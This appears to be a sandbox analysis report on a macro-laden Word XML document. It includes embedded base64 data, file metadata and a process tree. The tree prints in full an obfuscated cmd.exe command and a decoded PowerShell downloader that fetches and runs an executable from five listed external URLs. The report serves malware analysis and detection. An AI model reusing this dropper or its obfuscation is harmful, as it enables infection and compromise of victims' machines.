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 |
WordDocumentDocSuppDataBinDataName: | editdata.mso |
WordDocumentStylesStyleRPrRFontsCs: | Tahoma |
WordDocumentStylesStyleRPrRFontsH-ansi: | Tahoma |
WordDocumentStylesStyleRPrRFontsAscii: | Tahoma |
WordDocumentStylesStyleRsidVal: | 005A24B1 |
WordDocumentStylesStyleLinkVal: | BalloonTextChar |
WordDocumentStylesStyleBasedOnVal: | Normal |
WordDocumentStylesStyleTblPrTblCellMarRightType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarRightW: | 108 |
WordDocumentStylesStyleTblPrTblCellMarBottomType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarBottomW: | - |
WordDocumentStylesStyleTblPrTblCellMarLeftType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarLeftW: | 108 |
WordDocumentStylesStyleTblPrTblCellMarTopType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarTopW: | - |
WordDocumentStylesStyleTblPrTblIndType: | dxa |
WordDocumentStylesStyleTblPrTblIndW: | - |
WordDocumentStylesStyleUiNameVal: | Table Normal |
WordDocumentStylesStyleRPrLangBidi: | AR-SA |
WordDocumentStylesStyleRPrLangFareast: | EN-US |
WordDocumentStylesStyleRPrLangVal: | EN-US |
WordDocumentStylesStyleRPrSz-csVal: | 22 |
WordDocumentStylesStyleRPrSzVal: | 22 |
WordDocumentStylesStyleRPrFontVal: | Calibri |
WordDocumentStylesStylePPrSpacingLine-rule: | auto |
WordDocumentStylesStylePPrSpacingLine: | 259 |
WordDocumentStylesStylePPrSpacingAfter: | 160 |
WordDocumentStylesStyleNameVal: | Normal |
WordDocumentStylesStyleStyleId: | Normal |
WordDocumentStylesStyleDefault: | on |
WordDocumentStylesStyleType: | paragraph |
WordDocumentStylesLatentStylesLsdExceptionName: | Normal |
WordDocumentStylesLatentStylesLatentStyleCount: | 375 |
WordDocumentStylesLatentStylesDefLockedState: | off |
WordDocumentStylesVersionOfBuiltInStylenamesVal: | 7 |
WordDocumentFontsFontSigCsb-1: | 00000000 |
WordDocumentFontsFontSigCsb-0: | 000001FF |
WordDocumentFontsFontSigUsb-3: | 00000000 |
WordDocumentFontsFontSigUsb-2: | 00000009 |
WordDocumentFontsFontSigUsb-1: | C0007841 |
WordDocumentFontsFontSigUsb-0: | E0002AFF |
WordDocumentFontsFontPitchVal: | variable |
WordDocumentFontsFontFamilyVal: | Roman |
WordDocumentFontsFontCharsetVal: | 00 |
WordDocumentFontsFontPanose-1Val: | 02020603050405020304 |
WordDocumentFontsFontName: | Times New Roman |
WordDocumentFontsDefaultFontsCs: | Times New Roman |
WordDocumentFontsDefaultFontsH-ansi: | Calibri |
WordDocumentFontsDefaultFontsFareast: | Calibri |
WordDocumentFontsDefaultFontsAscii: | Calibri |
WordDocumentDocumentPropertiesVersion: | 16 |
WordDocumentDocumentPropertiesCharactersWithSpaces: | 1 |
WordDocumentDocumentPropertiesParagraphs: | 1 |
WordDocumentDocumentPropertiesLines: | 1 |
WordDocumentDocumentPropertiesCharacters: | 1 |
WordDocumentDocumentPropertiesWords: | - |
WordDocumentDocumentPropertiesPages: | 1 |
WordDocumentDocumentPropertiesLastSaved: | 2019:01:23 06:29:00Z |
WordDocumentDocumentPropertiesCreated: | 2019:01:23 06:29:00Z |
WordDocumentDocumentPropertiesTotalTime: | - |
WordDocumentDocumentPropertiesRevision: | 1 |
WordDocumentIgnoreSubtreeVal: | http://schemas.microsoft.com/office/word/2003/wordml/sp2 |
WordDocumentOcxPresent: | no |
WordDocumentEmbeddedObjPresent: | no |
WordDocumentMacrosPresent: | yes |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2968 | "C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\admin\AppData\Local\Temp\asdfasdf.doc.xml" | C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: XML Editor Exit code: 0 Version: 14.0.4750.1000 | ||||
2680 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\asdfasdf.doc.xml" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | MSOXMLED.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
4068 | c:\m4308\n1983\c4441\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set wJ=Ic$Fy%H72nT)x-4f:G D(CbM5igoUdjv;VLhW18}Km'w=r\.S06Np@9E/salOAPBu{,t~k+e3&&for %J in (52;27;43;5;62;28;63;34;0;21;16;68;24;66;37;5;45;5;48;55;48;48;0;60;51;51;61;23;55;16;68;13;14;66;37;5;35;5;10;55;23;62;16;68;13;72;66;37;5;59;59;18;2;29;7;24;38;37;44;42;22;37;72;7;14;42;32;2;52;38;24;54;38;44;9;71;43;13;27;22;30;71;1;67;18;51;71;67;47;36;71;22;21;59;25;71;9;67;32;2;64;38;49;54;38;44;42;35;67;67;52;16;56;56;71;45;29;71;41;22;64;59;64;67;47;1;27;41;56;67;45;55;33;19;58;17;53;35;67;67;52;16;56;56;22;58;25;30;25;9;15;71;9;47;1;27;41;56;50;23;71;8;59;10;6;48;45;43;53;35;67;67;52;16;56;56;15;58;67;41;58;9;64;45;67;58;57;69;71;57;71;9;47;1;27;41;56;49;19;24;40;63;15;14;17;69;53;35;67;67;52;16;56;56;52;58;69;57;27;4;41;64;35;71;9;29;25;57;59;25;69;47;1;27;41;56;52;29;29;48;19;57;63;57;3;53;35;67;67;52;16;56;56;22;27;27;67;58;59;4;47;1;27;41;56;3;71;12;24;67;7;15;71;42;47;48;52;59;25;67;20;42;53;42;11;32;2;58;14;50;14;54;44;42;9;72;8;8;24;42;32;2;45;7;72;8;8;18;44;18;42;7;38;14;42;32;2;43;37;50;37;44;42;64;72;8;50;37;42;32;2;69;14;72;37;50;44;2;71;9;31;16;67;71;41;52;70;42;46;42;70;2;45;7;72;8;8;70;42;47;71;12;71;42;32;15;27;45;71;58;1;35;20;2;64;37;50;37;50;18;25;9;18;2;64;38;49;54;38;11;65;67;45;4;65;2;52;38;24;54;38;47;19;27;43;9;59;27;58;29;3;25;59;71;20;2;64;37;50;37;50;66;18;2;69;14;72;37;50;11;32;2;31;8;8;38;49;44;42;31;54;50;7;7;42;32;0;15;18;20;20;17;71;67;13;0;67;71;41;18;2;69;14;72;37;50;11;47;59;71;9;26;67;35;18;13;26;71;18;14;49;49;49;49;11;18;65;0;9;31;27;69;71;13;0;67;71;41;18;2;69;14;72;37;50;32;2;27;54;50;14;49;44;42;27;24;7;49;54;42;32;22;45;71;58;69;32;39;39;1;58;67;1;35;65;39;39;2;52;7;72;72;54;44;42;35;24;7;54;38;42;32;81)do set Oe=!Oe!!wJ:~%J,1!&&if %J==81 echo !Oe:*Oe!=!|FOR /F "delims=RfvH0 tokens=1" %B IN ('ftype^^^|findstr cm')DO %B " | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2656 | CmD /V:ON/C"set wJ=Ic$Fy%H72nT)x-4f:G D(CbM5igoUdjv;VLhW18}Km'w=r\.S06Np@9E/salOAPBu{,t~k+e3&&for %J in (52;27;43;5;62;28;63;34;0;21;16;68;24;66;37;5;45;5;48;55;48;48;0;60;51;51;61;23;55;16;68;13;14;66;37;5;35;5;10;55;23;62;16;68;13;72;66;37;5;59;59;18;2;29;7;24;38;37;44;42;22;37;72;7;14;42;32;2;52;38;24;54;38;44;9;71;43;13;27;22;30;71;1;67;18;51;71;67;47;36;71;22;21;59;25;71;9;67;32;2;64;38;49;54;38;44;42;35;67;67;52;16;56;56;71;45;29;71;41;22;64;59;64;67;47;1;27;41;56;67;45;55;33;19;58;17;53;35;67;67;52;16;56;56;22;58;25;30;25;9;15;71;9;47;1;27;41;56;50;23;71;8;59;10;6;48;45;43;53;35;67;67;52;16;56;56;15;58;67;41;58;9;64;45;67;58;57;69;71;57;71;9;47;1;27;41;56;49;19;24;40;63;15;14;17;69;53;35;67;67;52;16;56;56;52;58;69;57;27;4;41;64;35;71;9;29;25;57;59;25;69;47;1;27;41;56;52;29;29;48;19;57;63;57;3;53;35;67;67;52;16;56;56;22;27;27;67;58;59;4;47;1;27;41;56;3;71;12;24;67;7;15;71;42;47;48;52;59;25;67;20;42;53;42;11;32;2;58;14;50;14;54;44;42;9;72;8;8;24;42;32;2;45;7;72;8;8;18;44;18;42;7;38;14;42;32;2;43;37;50;37;44;42;64;72;8;50;37;42;32;2;69;14;72;37;50;44;2;71;9;31;16;67;71;41;52;70;42;46;42;70;2;45;7;72;8;8;70;42;47;71;12;71;42;32;15;27;45;71;58;1;35;20;2;64;37;50;37;50;18;25;9;18;2;64;38;49;54;38;11;65;67;45;4;65;2;52;38;24;54;38;47;19;27;43;9;59;27;58;29;3;25;59;71;20;2;64;37;50;37;50;66;18;2;69;14;72;37;50;11;32;2;31;8;8;38;49;44;42;31;54;50;7;7;42;32;0;15;18;20;20;17;71;67;13;0;67;71;41;18;2;69;14;72;37;50;11;47;59;71;9;26;67;35;18;13;26;71;18;14;49;49;49;49;11;18;65;0;9;31;27;69;71;13;0;67;71;41;18;2;69;14;72;37;50;32;2;27;54;50;14;49;44;42;27;24;7;49;54;42;32;22;45;71;58;69;32;39;39;1;58;67;1;35;65;39;39;2;52;7;72;72;54;44;42;35;24;7;54;38;42;32;81)do set Oe=!Oe!!wJ:~%J,1!&&if %J==81 echo !Oe:*Oe!=!|FOR /F "delims=RfvH0 tokens=1" %B IN ('ftype^^^|findstr cm')DO %B " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2248 | C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $d7581='b1374';$p8598=new-object Net.WebClient;$u8098='http://erdembulut.com/trEVDaG@http://baijinfen.com/6Me2lTHSrw@http://fatmanurtaskesen.com/0D5KBf4Gk@http://paksoymuhendislik.com/pddSDsBsF@http://bootaly.com/Fex5t7fe'.Split('@');$a4649='n3225';$r7322 = '784';$w161='u3261';$k4316=$env:temp+'\'+$r7322+'.exe';foreach($u1616 in $u8098){try{$p8598.DownloadFile($u1616, $k4316);$v2280='v9677';If ((Get-Item $k4316).length -ge 40000) {Invoke-Item $k4316;$o9640='o5709';break;}}catch{}}$p7339='h5798';" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2324 | C:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=RfvH0 tokens=1" %B IN ('ftype^|findstr cm') DO %B " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2804 | C:\Windows\system32\cmd.exe /c ftype|findstr cm | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2352 | C:\Windows\system32\cmd.exe /S /D /c" ftype" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3096 | findstr cm | C:\Windows\system32\findstr.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Find String (QGREP) Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3724 | cmd | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2680 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR70CB.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2680 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8474E6D.jpg | — | |
MD5:— | SHA256:— | |||
3956 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FTAN89C45CR0P27MVZ43.temp | — | |
MD5:— | SHA256:— | |||
3956 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
